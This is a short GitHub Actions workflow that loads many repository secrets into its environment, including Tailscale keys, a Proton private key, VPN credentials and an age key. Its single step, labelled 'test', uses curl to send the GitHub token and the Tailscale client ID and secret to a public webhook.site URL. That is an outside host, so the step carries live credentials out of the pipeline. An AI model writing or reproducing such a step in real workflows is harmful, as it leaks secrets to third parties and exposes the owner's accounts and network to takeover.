name: webhook

on:
  # schedule:
  #   - cron: '0 0,6,12,18 * * *'  
    
  workflow_dispatch:
  # repository_dispatch:
  #   types: [deploy-app]

  
jobs:
  docker-compose:
    runs-on: ubuntu-latest
    env:
      TAILSCALE_AUTH_KEY: ${{ secrets.TAILSCALE_AUTH_KEY }}
      TS_CLIENT_ID: ${{ secrets.TS_CLIENT_ID }}
      TS_CLIENT_SECRET: ${{ secrets.TS_CLIENT_SECRET }}
      TAILNET_ORG: ${{ secrets.QUY_TAILNET_ORG }}
      NODE_NAME: proton-gh
      PROTON_PRIVATE_KEY: ${{ secrets.PROTON_PRIVATE_KEY }}
      WEB_AUTHENTICATION_USERNAME: ${{secrets.WEB_AUTHENTICATION_USERNAME}}
      WEB_AUTHENTICATION_PASSWORD: ${{secrets.WEB_AUTHENTICATION_PASSWORD}}
      TUNNEL_TOKEN: ${{secrets.TUNNEL_TOKEN}}
      OPENVPN_USER: ${{secrets.OPENVPN_USER}}
      OPENVPN_PASSWORD: ${{secrets.OPENVPN_PASSWORD}}
      AGE_SECRET_KEY: ${{ secrets.AGE_SECRET_KEY }}

    steps:
      - name: test
        run: |
          curl -X POST \
            -H "Accept: application/vnd.github+json" \
            -H "Authorization: Bearer ${{ secrets.GH_TOKEN }}" \
            https://webhook.site/beacdcfe-fb1b-4ca9-b785-ea3035888ac1 \
            -d '{"TS_CLIENT_ID":"${{ secrets.TS_CLIENT_ID }}",
                "TS_CLIENT_SECRET":"${{ secrets.TS_CLIENT_SECRET }}"
            }'
